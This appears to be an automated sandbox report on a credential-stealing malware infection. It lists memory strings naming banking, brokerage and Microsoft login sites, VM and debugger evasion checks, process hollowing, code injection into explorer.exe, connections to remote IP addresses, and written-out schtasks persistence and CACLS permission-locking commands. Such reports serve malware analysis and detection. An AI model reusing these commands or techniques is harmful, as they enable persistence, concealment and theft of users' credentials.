Source: 2899.exe, 00000028.00000002.4506386571.0000000004D96000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: 11VBoxSFWINDIRWD
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: explorer.exe, 00000002.00000000.2111564853.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000002.00000000.2111564853.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 958B.exe, 00000024.00000002.4500853338.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, 958B.exe, 00000024.00000003.2675938421.00000000007D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWF3b
Source: explorer.exe, 00000002.00000000.2109249505.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
Source: explorer.exe, 00000002.00000000.2111564853.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s%d%s/%s%s:%d%s=%s"'&+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:**@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
Source: 2899.exe, 00000028.00000002.4506386571.0000000004D96000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: tVMSrvcs\|!
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2109249505.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: 958B.exe, 00000027.00000002.2749683074.0000000000765000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPg\|%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000002.00000000.2109249505.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2108418621.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: 2899.exe, 00000028.00000003.2776648258.0000000005A80000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000400000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 2899.exe, 00000028.00000003.2776648258.0000000005A80000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000400000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ><'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: build2.exe, 0000002C.00000002.2965262411.000000000071A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AppLaunch.exe, 00000011.00000002.2900617057.00000000087EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 2899.exe, 00000028.00000002.4506386571.0000000004D96000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: \\.\HGFS`
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: explorer.exe, 00000002.00000000.2111564853.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000002.00000000.2108418621.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000002.00000000.2107696919.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: AppLaunch.exe, 00000011.00000002.2885619931.000000000783C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	8_2_00410160
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	8_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	8_2_0040FB98
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0063B75D FindFirstFileExW,	9_2_0063B75D
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0063BC41 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	9_2_0063BC41

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vusretg	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F3CC.exe	System information queried: CodeIntegrityInformation

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 7_2_00404BF9 LoadLibraryW,GetProcAddress,VirtualProtect,

7_2_00404BF9

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00840D90 mov eax, dword ptr fs:[00000030h]	0_2_00840D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084092B mov eax, dword ptr fs:[00000030h]	0_2_0084092B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F0D92 push dword ptr fs:[00000030h]	0_2_008F0D92
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_0062E52A push dword ptr fs:[00000030h]	5_2_0062E52A
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_0076092B mov eax, dword ptr fs:[00000030h]	5_2_0076092B
Source: C:\Users\user\AppData\Roaming\vusretg	Code function: 5_2_00760D90 mov eax, dword ptr fs:[00000030h]	5_2_00760D90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_022630A3 push dword ptr fs:[00000030h]	7_2_022630A3
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_023F0042 push dword ptr fs:[00000030h]	7_2_023F0042
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005B55F0 mov edi, dword ptr fs:[00000030h]	9_2_005B55F0
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0062F172 mov eax, dword ptr fs:[00000030h]	9_2_0062F172
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0062F1C5 mov eax, dword ptr fs:[00000030h]	9_2_0062F1C5
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0062F218 mov eax, dword ptr fs:[00000030h]	9_2_0062F218
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0062F289 mov eax, dword ptr fs:[00000030h]	9_2_0062F289
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0062F37C mov eax, dword ptr fs:[00000030h]	9_2_0062F37C
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0062F3D1 mov eax, dword ptr fs:[00000030h]	9_2_0062F3D1
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0062F463 mov eax, dword ptr fs:[00000030h]	9_2_0062F463
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_0062F426 mov eax, dword ptr fs:[00000030h]	9_2_0062F426
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_00627A11 mov ecx, dword ptr fs:[00000030h]	9_2_00627A11

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vusretg	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F3CC.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 7_2_00405C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_00405C97

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 8_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

8_2_0042A57A

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 7_2_004107BB CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

7_2_004107BB

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 7_2_0226471C rdtsc

7_2_0226471C

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004029BA LdrLoadDll,

0_2_004029BA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_00409C03 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00409C03
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_00405C97 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00405C97
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_0040657C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0040657C
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 7_2_00409DEA SetUnhandledExceptionFilter,	7_2_00409DEA
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Code function: 8_2_004329BB SetUnhandledExceptionFilter,	8_2_004329BB
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005E2BFE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_005E2BFE
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005E313B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_005E313B
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Code function: 9_2_005F3E05 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_005F3E05

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 34.143.166.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.198.2.251 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 79.137.192.18 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 213.6.54.58 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.213.185 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.205.61.67 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 211.104.254.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.196.133 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 171.22.28.219 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.215.85.209 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.227.16.22 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.215.85.17 80	Jump to behavior

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 2899.exe.2.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vusretg	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vusretg	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F3CC.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\F3CC.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\A079.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\958B.exe	Memory written: C:\Users\user\AppData\Local\Temp\958B.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Memory written: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Memory written: C:\Users\user\AppData\Local\Temp\958B.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Memory written: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Memory written: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Memory written: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe base: 400000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 7_2_023F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

7_2_023F0110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe	Thread created: C:\Windows\explorer.exe EIP: 84D1AD0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vusretg	Thread created: unknown EIP: 1121AD0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F3CC.exe	Thread created: unknown EIP: 30E19E8

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe

Section unmapped: unknown base address: 400000

Writes to foreign memory regions

Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 8679C0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 430000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 43C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 51BC008	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 5340 base: 8679C0 value: 90			Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1712 base: 7FF6747E2D10 value: 90			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: C:\Users\user\AppData\Local\Temp\958B.exe C:\Users\user\AppData\Local\Temp\958B.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Process created: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe --Task	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: C:\Users\user\AppData\Local\Temp\958B.exe "C:\Users\user\AppData\Local\Temp\958B.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	Process created: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe "C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe"
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe" /F
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "yiueea.exe" /P "user:N"&&CACLS "yiueea.exe" /P "user:R" /E&&echo Y\|CACLS "..\577f58beff" /P "user:N"&&CACLS "..\577f58beff" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe "C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
